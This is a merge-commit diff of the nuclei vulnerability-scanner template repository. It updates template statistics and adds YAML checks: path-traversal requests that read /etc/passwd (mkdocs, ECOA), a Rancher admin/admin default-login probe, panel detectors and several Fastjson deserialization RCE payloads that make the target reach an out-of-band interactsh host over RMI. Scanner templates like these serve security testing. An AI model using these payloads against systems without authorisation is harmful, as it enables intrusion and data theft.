Merge branch 'projectdiscovery:master' into master
commit
20f4257f91
|
@ -1,6 +1,9 @@
|
|||
name: 🗒 Templates Stats
|
||||
|
||||
on:
|
||||
create:
|
||||
tags:
|
||||
- v*
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
|
|
22
README.md
22
README.md
|
@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
|
|||
|
||||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 818 | daffainfo | 285 | cves | 821 | info | 733 | http | 2164 |
|
||||
| lfi | 330 | pikpikcu | 279 | vulnerabilities | 316 | high | 632 | file | 49 |
|
||||
| panel | 259 | dhiyaneshdk | 268 | exposed-panels | 255 | medium | 471 | network | 45 |
|
||||
| xss | 256 | pdteam | 201 | technologies | 201 | critical | 284 | dns | 12 |
|
||||
| wordpress | 245 | geeknik | 159 | exposures | 191 | low | 155 | | |
|
||||
| exposure | 239 | dwisiswant0 | 131 | misconfiguration | 137 | | | | |
|
||||
| rce | 204 | gy741 | 81 | takeovers | 65 | | | | |
|
||||
| tech | 193 | pussycat0x | 72 | token-spray | 63 | | | | |
|
||||
| wp-plugin | 170 | princechaddha | 64 | default-logins | 58 | | | | |
|
||||
| cve2020 | 164 | madrobot | 63 | file | 49 | | | | |
|
||||
| cve | 827 | daffainfo | 288 | cves | 831 | info | 743 | http | 2195 |
|
||||
| lfi | 337 | pikpikcu | 280 | vulnerabilities | 324 | high | 641 | file | 50 |
|
||||
| panel | 267 | dhiyaneshdk | 273 | exposed-panels | 264 | medium | 474 | network | 45 |
|
||||
| xss | 258 | pdteam | 201 | technologies | 201 | critical | 294 | dns | 12 |
|
||||
| wordpress | 249 | geeknik | 162 | exposures | 191 | low | 155 | | |
|
||||
| exposure | 239 | dwisiswant0 | 131 | misconfiguration | 139 | | | | |
|
||||
| rce | 212 | gy741 | 81 | takeovers | 65 | | | | |
|
||||
| tech | 195 | pussycat0x | 72 | token-spray | 63 | | | | |
|
||||
| wp-plugin | 172 | princechaddha | 66 | default-logins | 60 | | | | |
|
||||
| cve2020 | 164 | madrobot | 63 | file | 50 | | | | |
|
||||
|
||||
**171 directories, 2333 files**.
|
||||
**175 directories, 2366 files**.
|
||||
|
||||
</td>
|
||||
</tr>
|
||||
|
|
File diff suppressed because one or more lines are too long
1800
TEMPLATES-STATS.md
1800
TEMPLATES-STATS.md
File diff suppressed because it is too large
Load Diff
20
TOP-10.md
20
TOP-10.md
|
@ -1,12 +1,12 @@
|
|||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 818 | daffainfo | 285 | cves | 821 | info | 733 | http | 2164 |
|
||||
| lfi | 330 | pikpikcu | 279 | vulnerabilities | 316 | high | 632 | file | 49 |
|
||||
| panel | 259 | dhiyaneshdk | 268 | exposed-panels | 255 | medium | 471 | network | 45 |
|
||||
| xss | 256 | pdteam | 201 | technologies | 201 | critical | 284 | dns | 12 |
|
||||
| wordpress | 245 | geeknik | 159 | exposures | 191 | low | 155 | | |
|
||||
| exposure | 239 | dwisiswant0 | 131 | misconfiguration | 137 | | | | |
|
||||
| rce | 204 | gy741 | 81 | takeovers | 65 | | | | |
|
||||
| tech | 193 | pussycat0x | 72 | token-spray | 63 | | | | |
|
||||
| wp-plugin | 170 | princechaddha | 64 | default-logins | 58 | | | | |
|
||||
| cve2020 | 164 | madrobot | 63 | file | 49 | | | | |
|
||||
| cve | 827 | daffainfo | 288 | cves | 831 | info | 743 | http | 2195 |
|
||||
| lfi | 337 | pikpikcu | 280 | vulnerabilities | 324 | high | 641 | file | 50 |
|
||||
| panel | 267 | dhiyaneshdk | 273 | exposed-panels | 264 | medium | 474 | network | 45 |
|
||||
| xss | 258 | pdteam | 201 | technologies | 201 | critical | 294 | dns | 12 |
|
||||
| wordpress | 249 | geeknik | 162 | exposures | 191 | low | 155 | | |
|
||||
| exposure | 239 | dwisiswant0 | 131 | misconfiguration | 139 | | | | |
|
||||
| rce | 212 | gy741 | 81 | takeovers | 65 | | | | |
|
||||
| tech | 195 | pussycat0x | 72 | token-spray | 63 | | | | |
|
||||
| wp-plugin | 172 | princechaddha | 66 | default-logins | 60 | | | | |
|
||||
| cve2020 | 164 | madrobot | 63 | file | 50 | | | | |
|
||||
|
|
|
@ -38,6 +38,7 @@ requests:
|
|||
words:
|
||||
- "uid="
|
||||
- "gid="
|
||||
- "groups="
|
||||
condition: and
|
||||
part: body
|
||||
- type: status
|
||||
|
|
File diff suppressed because one or more lines are too long
|
@ -0,0 +1,28 @@
|
|||
id: CVE-2021-40978
|
||||
|
||||
info:
|
||||
name: mkdocs 1.2.2 built-in dev-server allows directory traversal
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
reference:
|
||||
- https://github.com/nisdn/CVE-2021-40978
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-40978
|
||||
tags: cve,cve2021,mkdocs,lfi
|
||||
description: "** DISPUTED ** The mkdocs 1.2.2 built-in dev-server allows directory traversal using the port 8000, enabling remote exploitation to obtain :sensitive information. NOTE: the vendor has disputed this as described in https://github.com/mkdocs/mkdocs/issues/2601.] and https://github.com/nisdn/CVE-2021-40978/issues/1."
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,12 +1,19 @@
|
|||
id: ecoa-building-lfi
|
||||
id: CVE-2021-41291
|
||||
|
||||
info:
|
||||
name: ECOA Building Automation System - Directory Traversal Content Disclosure
|
||||
author: gy741
|
||||
severity: high
|
||||
description: The BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device
|
||||
reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5670.php
|
||||
tags: ecoa,lfi
|
||||
reference:
|
||||
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5670.php
|
||||
- https://www.twcert.org.tw/en/cp-139-5140-6343c-2.html
|
||||
tags: cve,cve2021,ecoa,lfi
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.50
|
||||
cve-id: CVE-2021-41291
|
||||
cwe-id: CWE-22
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
@ -18,4 +25,3 @@ requests:
|
|||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
part: body
|
|
@ -0,0 +1,35 @@
|
|||
id: CVE-2021-41293
|
||||
|
||||
info:
|
||||
name: ECOA Building Automation System - LFD
|
||||
author: 0x_Akoko
|
||||
severity: high
|
||||
description: The BAS controller suffers from an arbitrary file disclosure vulnerability. Using the 'fname' POST parameter in viewlog.jsp, attackers can disclose arbitrary files on the affected device and disclose sensitive and system information.
|
||||
reference:
|
||||
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php
|
||||
- https://www.twcert.org.tw/tw/cp-132-5129-7e623-1.html
|
||||
tags: cve,cve2021,ecoa,lfi
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.50
|
||||
cve-id: CVE-2021-41293
|
||||
cwe-id: CWE-22
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /viewlog.jsp HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
yr=2021&mh=6&fname=../../../../../../../../etc/passwd
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -17,6 +17,8 @@ info:
|
|||
cvss-score: 7.50
|
||||
cve-id: CVE-2021-41773
|
||||
cwe-id: CWE-22
|
||||
metadata:
|
||||
shodan-query: https://www.shodan.io/search?query=apache+version%3A2.4.49
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
|
|
@ -0,0 +1,52 @@
|
|||
id: rancher-default-login
|
||||
|
||||
info:
|
||||
name: Rancher Default Login
|
||||
author: princechaddha
|
||||
severity: high
|
||||
description: Rancher is a open-source multi-cluster orchestration platform, lets operations teams deploy, manage and secure enterprise Kubernetes.
|
||||
reference: https://github.com/rancher/rancher
|
||||
tags: default-login,rancher,kubernetes,devops,cloud
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /v3/settings/first-login HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36
|
||||
|
||||
- |
|
||||
POST /v3-public/localProviders/local?action=login HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Cookie: CSRF={{csrf}}
|
||||
X-Api-Csrf: {{csrf}}
|
||||
Connection: close
|
||||
Content-Length: 136
|
||||
|
||||
{"username":"{{username}}","password":"{{password}}","description":"UI Session","responseType":"cookie","labels":{"ui-session":"true"}}
|
||||
|
||||
payloads:
|
||||
username:
|
||||
- admin
|
||||
password:
|
||||
- admin
|
||||
attack: pitchfork
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- 'R_SESS=token'
|
||||
part: header
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: csrf
|
||||
group: 1
|
||||
internal: true
|
||||
part: header
|
||||
regex:
|
||||
- 'Set-Cookie: CSRF=([a-z0-9]+)'
|
|
@ -0,0 +1,25 @@
|
|||
id: cisco-ace-device-manager
|
||||
|
||||
info:
|
||||
name: ACE 4710 Device Manager
|
||||
author: dhiyaneshDk
|
||||
severity: info
|
||||
tags: panel,cisco
|
||||
metadata:
|
||||
shodan: 'html:"ACE 4710 Device Manager"'
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.vm"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<title>ACE 4710 DM - Login</title>"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,25 @@
|
|||
id: cisco-edge-340
|
||||
|
||||
info:
|
||||
name: Cisco Edge 340
|
||||
author: dhiyaneshDk
|
||||
severity: info
|
||||
tags: panel,cisco
|
||||
metadata:
|
||||
shodan: 'http.title:"Cisco Edge 340"'
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/auth/?next=%2F"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<title>Cisco Edge 340</title>"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,25 @@
|
|||
id: cisco-secure-cn
|
||||
|
||||
info:
|
||||
name: Cisco Secure CN
|
||||
author: dhiyaneshDk
|
||||
severity: info
|
||||
tags: panel,cisco
|
||||
metadata:
|
||||
shodan: 'http.title:"Cisco Secure CN"'
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/login"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<title>Cisco Secure CN</title>"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,25 @@
|
|||
id: cisco-systems-login
|
||||
|
||||
info:
|
||||
name: Cisco Systems Login
|
||||
author: dhiyaneshDk
|
||||
severity: info
|
||||
tags: panel,cisco
|
||||
metadata:
|
||||
shodan: 'http.title:"Cisco Systems Login"'
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<TITLE>Cisco Systems Login</TITLE>"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,25 @@
|
|||
id: cisco-telepresence
|
||||
|
||||
info:
|
||||
name: Cisco Telepresence
|
||||
author: dhiyaneshDk
|
||||
severity: info
|
||||
tags: panel,cisco
|
||||
metadata:
|
||||
shodan: 'http.title:"Cisco Telepresence"'
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/login.html"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<title>Cisco TelePresence MCU - login:</title>"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,34 @@
|
|||
id: rancher-panel
|
||||
|
||||
info:
|
||||
name: Rancher Login Panel
|
||||
author: princechaddha
|
||||
severity: info
|
||||
description: Rancher is a open-source multi-cluster orchestration platform, lets operations teams deploy, manage and secure enterprise Kubernetes.
|
||||
reference: https://github.com/rancher/rancher
|
||||
tags: panel,rancher,kubernetes,devops,cloud
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<title>Loading…</title>"
|
||||
- "global-admin/config/environment"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
group: 1
|
||||
regex:
|
||||
- '<!\-\- ([0-9. ]+)\-\->'
|
|
@ -0,0 +1,35 @@
|
|||
id: pma-server-import
|
||||
|
||||
info:
|
||||
name: PhpMyAdmin Server Import
|
||||
author: Cristi vlad (@cristivlad25)
|
||||
severity: high
|
||||
description: Finds Unauthenticated PhpMyAdmin Server Import Pages.
|
||||
tags: phpmyadmin,misconfig
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/pma/server_import.php"
|
||||
- "{{BaseURL}}/phpmyadmin/server_import.php"
|
||||
- "{{BaseURL}}/phpMyAdmin 2/server_import.php"
|
||||
- "{{BaseURL}}/db/server_import.php"
|
||||
- "{{BaseURL}}/server_import.php"
|
||||
- "{{BaseURL}}/PMA/server_import.php"
|
||||
- "{{BaseURL}}/admin/server_import.php"
|
||||
- "{{BaseURL}}/admin/pma/server_import.php"
|
||||
- "{{BaseURL}}/phpMyAdmin/server_import.php"
|
||||
- "{{BaseURL}}/admin/phpMyAdmin/server_import.php"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
condition: and
|
||||
words:
|
||||
- "File to import"
|
||||
- "Location of the text file"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -2,7 +2,7 @@ id: aviatrix-detect
|
|||
|
||||
info:
|
||||
name: Aviatrix Detect
|
||||
author: pikpikcu
|
||||
author: pikpikcu,philippedelteil
|
||||
severity: info
|
||||
tags: tech,aviatrix
|
||||
|
||||
|
@ -10,15 +10,20 @@ requests:
|
|||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
- "{{BaseURL}}/assets/img/favicon-32x32.png"
|
||||
|
||||
matchers-condition: and
|
||||
stop-at-first-match: true
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
- type: dsl
|
||||
name: "title"
|
||||
condition: and
|
||||
dsl:
|
||||
- 'contains(body, "<title>Aviatrix")'
|
||||
- 'contains(body, "Controller</title>")'
|
||||
- 'status_code == 200'
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<title>Aviatrix Controller</title>"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: dsl
|
||||
name: "favicon"
|
||||
dsl:
|
||||
- "status_code==200 && (\"7c1c26856345cd7edbf250ead0dc9332\" == md5(body))"
|
||||
|
|
|
@ -5,7 +5,9 @@ info:
|
|||
author: philippedelteil
|
||||
severity: info
|
||||
description: Allows you to detect Atlassian Confluence instances
|
||||
tags: tech,confluence
|
||||
tags: tech,confluence,atlassian
|
||||
metadata:
|
||||
shodan-query: https://www.shodan.io/search?query=http.component%3A%22atlassian+confluence%22
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -20,3 +20,4 @@ requests:
|
|||
negative: true
|
||||
words:
|
||||
- 'BadApiKey'
|
||||
- 'RateLimitExceeded' # Matchers needs to be replaced with valid +ve match instead of -ve
|
||||
|
|
|
@ -0,0 +1,51 @@
|
|||
id: fastjson-1.2.24-rce
|
||||
|
||||
info:
|
||||
name: Fastjson 1.2.24 Deserialization RCE
|
||||
author: zh
|
||||
severity: critical
|
||||
reference:
|
||||
- https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.24-rce
|
||||
- https://www.freebuf.com/vuls/208339.html
|
||||
- https://github.com/wyzxxz/fastjson_rce_tool
|
||||
tags: fastjson,rce,deserialization,oob
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/json
|
||||
|
||||
{
|
||||
"b":{
|
||||
"@type":"com.sun.rowset.JdbcRowSetImpl",
|
||||
"dataSourceName":"rmi://{{interactsh-url}}/Exploit",
|
||||
"autoCommit":true
|
||||
}
|
||||
}
|
||||
|
||||
- |
|
||||
POST / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/json
|
||||
|
||||
{
|
||||
"@type":"com.sun.rowset.JdbcRowSetImpl",
|
||||
"dataSourceName":"rmi://{{interactsh-url}}/Exploit",
|
||||
"autoCommit":true
|
||||
}
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol # Confirms DNS Interaction
|
||||
words:
|
||||
- "dns"
|
||||
|
||||
- type: word
|
||||
condition: and
|
||||
words:
|
||||
- "Internal Server Error"
|
||||
- "500"
|
|
@ -0,0 +1,35 @@
|
|||
id: fastjson-1.2.41-rce
|
||||
|
||||
info:
|
||||
name: Fastjson 1.2.41 Deserialization RCE
|
||||
author: zh
|
||||
severity: critical
|
||||
reference:
|
||||
- https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson
|
||||
- https://github.com/wyzxxz/fastjson_rce_tool
|
||||
tags: fastjson,rce,deserialization,oob
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/json
|
||||
|
||||
{
|
||||
"@type":"Lcom.sun.rowset.JdbcRowSetImpl",
|
||||
"dataSourceName":"rmi://{{interactsh-url}}/Exploit",
|
||||
"autoCommit":true
|
||||
}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol # Confirms DNS Interaction
|
||||
words:
|
||||
- "dns"
|
||||
|
||||
- type: status
|
||||
negative: true
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,35 @@
|
|||
id: fastjson-1.2.42-rce
|
||||
|
||||
info:
|
||||
name: Fastjson 1.2.42 Deserialization RCE
|
||||
author: zh
|
||||
severity: critical
|
||||
reference:
|
||||
- https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson
|
||||
- https://github.com/wyzxxz/fastjson_rce_tool
|
||||
tags: fastjson,rce,deserialization,oob
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/json
|
||||
|
||||
{
|
||||
"@type":"LL\u0063\u006f\u006d.sun.rowset.JdbcRowSetImpl;;",
|
||||
"dataSourceName":"rmi://{{interactsh-url}}/Exploit",
|
||||
"autoCommit":true
|
||||
}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol # Confirms DNS Interaction
|
||||
words:
|
||||
- "dns"
|
||||
|
||||
- type: status
|
||||
negative: true
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,35 @@
|
|||
id: fastjson-1.2.43-rce
|
||||
|
||||
info:
|
||||
name: Fastjson 1.2.43 Deserialization RCE
|
||||
author: zh
|
||||
severity: critical
|
||||
reference:
|
||||
- https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson
|
||||
- https://github.com/wyzxxz/fastjson_rce_tool
|
||||
tags: fastjson,rce,deserialization,oob
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/json
|
||||
|
||||
{
|
||||
"@type":"com.sun.rowset.JdbcRowSetImpl",
|
||||
"dataSourceName":"rmi://{{interactsh-url}}/Exploit",
|
||||
"autoCommit":true
|
||||
}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol # Confirms DNS Interaction
|
||||
words:
|
||||
- "dns"
|
||||
|
||||
- type: status
|
||||
negative: true
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,44 @@
|
|||
id: fastjson-1.2.47-rce
|
||||
|
||||
info:
|
||||
name: Fastjson 1.2.47 Deserialization RCE
|
||||
author: zh
|
||||
severity: critical
|
||||
reference:
|
||||
- https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.47-rce
|
||||
- https://www.freebuf.com/vuls/208339.html
|
||||
- https://cert.360.cn/warning/detail?id=7240aeab581c6dc2c9c5350756079955
|
||||
- https://github.com/wyzxxz/fastjson_rce_tool
|
||||
tags: fastjson,rce,deserialization,oob
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/json
|
||||
|
||||
{
|
||||
"a":{
|
||||
"@type":"java.lang.Class",
|
||||
"val":"com.sun.rowset.JdbcRowSetImpl"
|
||||
},
|
||||
"b":{
|
||||
"@type":"com.sun.rowset.JdbcRowSetImpl",
|
||||
"dataSourceName":"rmi://{{interactsh-url}}/Exploit",
|
||||
"autoCommit":true
|
||||
}
|
||||
}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol # Confirms DNS Interaction
|
||||
words:
|
||||
- "dns"
|
||||
|
||||
- type: word
|
||||
condition: and
|
||||
words:
|
||||
- "Bad Request"
|
||||
- "400"
|
|
@ -0,0 +1,34 @@
|
|||
id: fastjson-1.2.62-rce
|
||||
|
||||
info:
|
||||
name: Fastjson 1.2.62 Deserialization RCE
|
||||
author: zh
|
||||
severity: critical
|
||||
reference:
|
||||
- https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson
|
||||
- https://github.com/wyzxxz/fastjson_rce_tool
|
||||
tags: fastjson,rce,deserialization,oob
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/json
|
||||
|
||||
{
|
||||
"@type":"org.apache.xbean.propertyeditor.JndiConverter",
|
||||
"AsText":"rmi://{{interactsh-url}}/exploit"
|
||||
}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol # Confirms DNS Interaction
|
||||
words:
|
||||
- "dns"
|
||||
|
||||
- type: status
|
||||
negative: true
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,37 @@
|
|||
id: fastjson-1.2.67-rce
|
||||
|
||||
info:
|
||||
name: Fastjson 1.2.67 Deserialization RCE
|
||||
author: zh
|
||||
severity: critical
|
||||
reference:
|
||||
- https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson
|
||||
- https://github.com/wyzxxz/fastjson_rce_tool
|
||||
tags: fastjson,rce,deserialization,oob
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/json
|
||||
|
||||
{
|
||||
"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig",
|
||||
"properties":{
|
||||
"@type":"java.util.Properties",
|
||||
"UserTransaction":"rmi://{{interactsh-url}}/Exploit"
|
||||
}
|
||||
}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol # Confirms DNS Interaction
|
||||
words:
|
||||
- "dns"
|
||||
|
||||
- type: status
|
||||
negative: true
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,55 @@
|
|||
id: fastjson-1.2.68-rce
|
||||
|
||||
info:
|
||||
name: Fastjson 1.2.68 Deserialization RCE
|
||||
author: zh
|
||||
severity: critical
|
||||
reference:
|
||||
- https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson
|
||||
- https://github.com/wyzxxz/fastjson_rce_tool
|
||||
tags: fastjson,rce,deserialization,oob
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/json
|
||||
|
||||
{
|
||||
"@type":"org.apache.shiro.jndi.JndiObjectFactory",
|
||||
"resourceName":"rmi://{{interactsh-url}}/Exploit"
|
||||
}
|
||||
|
||||
- |
|
||||
POST / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/json
|
||||
|
||||
{
|
||||
"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup",
|
||||
"jndiNames":"rmi://{{interactsh-url}}/Exploit"
|
||||
}
|
||||
|
||||
- |
|
||||
POST / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/json
|
||||
|
||||
{
|
||||
"@type":"br.com.anteros.dbcp.AnterosDBCPConfig",
|
||||
"metricRegistry":"rmi:/{{interactsh-url}}/Exploit"
|
||||
}
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol # Confirms DNS Interaction
|
||||
words:
|
||||
- "dns"
|
||||
|
||||
- type: status
|
||||
negative: true
|
||||
status:
|
||||
- 200
|
|
@ -4,12 +4,12 @@ info:
|
|||
name: Bitrix Open URL redirect detection
|
||||
author: pikpikcu
|
||||
severity: low
|
||||
description: The Bitrix Russia Site Management 2.0 accepts a user-controlled input that specifies a link to an external site, and uses that link in a Redirect.
|
||||
reference: https://packetstormsecurity.com/files/151955/1C-Bitrix-Site-Management-Russia-2.0-Open-Redirection.html
|
||||
tags: redirect,bitrix
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
||||
path:
|
||||
- '{{BaseURL}}/bitrix/rk.php?goto=https://example.com'
|
||||
- '{{BaseURL}}/bitrix/redirect.php?event1=&event2=&event3=&goto=https://example.com'
|
||||
|
@ -33,7 +33,7 @@ requests:
|
|||
part: header
|
||||
|
||||
- type: status
|
||||
condition: or
|
||||
status:
|
||||
- 302
|
||||
- 301
|
||||
condition: or
|
||||
|
|
|
@ -4,7 +4,7 @@ info:
|
|||
name: COMMAX Biometric Access Control System 1.0.0 - Authentication Bypass
|
||||
author: gy741
|
||||
severity: critical
|
||||
description: The application suffers from an authentication bypass vulnerability. An unauthenticated attacker through cookie poisoning can bypass authentication and disclose sensitive information and circumvent physical controls in smart homes and buildings.
|
||||
description: The COMMAX Biometric Access Control System suffers from an authentication bypass vulnerability. An unauthenticated attacker through cookie poisoning can bypass authentication and disclose sensitive information and circumvent physical controls in smart homes and buildings.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/50206
|
||||
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5661.php
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: DedeCmsV5.6 Carbuyaction Fileinclude
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
description: A vulnerability in DedeCMS's 'carbuyaction.php' endpoint allows remote attackers to return the content of locally stored files via a vulnerability in the 'code' parameter.
|
||||
reference: https://www.cnblogs.com/milantgh/p/3615986.html
|
||||
tags: dedecms
|
||||
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: DedeCMS Membergroup SQLI
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
description: A vulnerability in the DedeCMS product allows remote unauthenticated users to inject arbitrary SQL statements via the 'ajax_membergroup.php' endpoint and the 'membergroup' parameter.
|
||||
reference: http://www.dedeyuan.com/xueyuan/wenti/1244.html
|
||||
tags: sqli,dedecms
|
||||
|
||||
|
|
|
@ -1,27 +0,0 @@
|
|||
id: ecoa-building-automation-lfd
|
||||
info:
|
||||
name: ECOA Building Automation System - LFD
|
||||
author: 0x_Akoko
|
||||
severity: high
|
||||
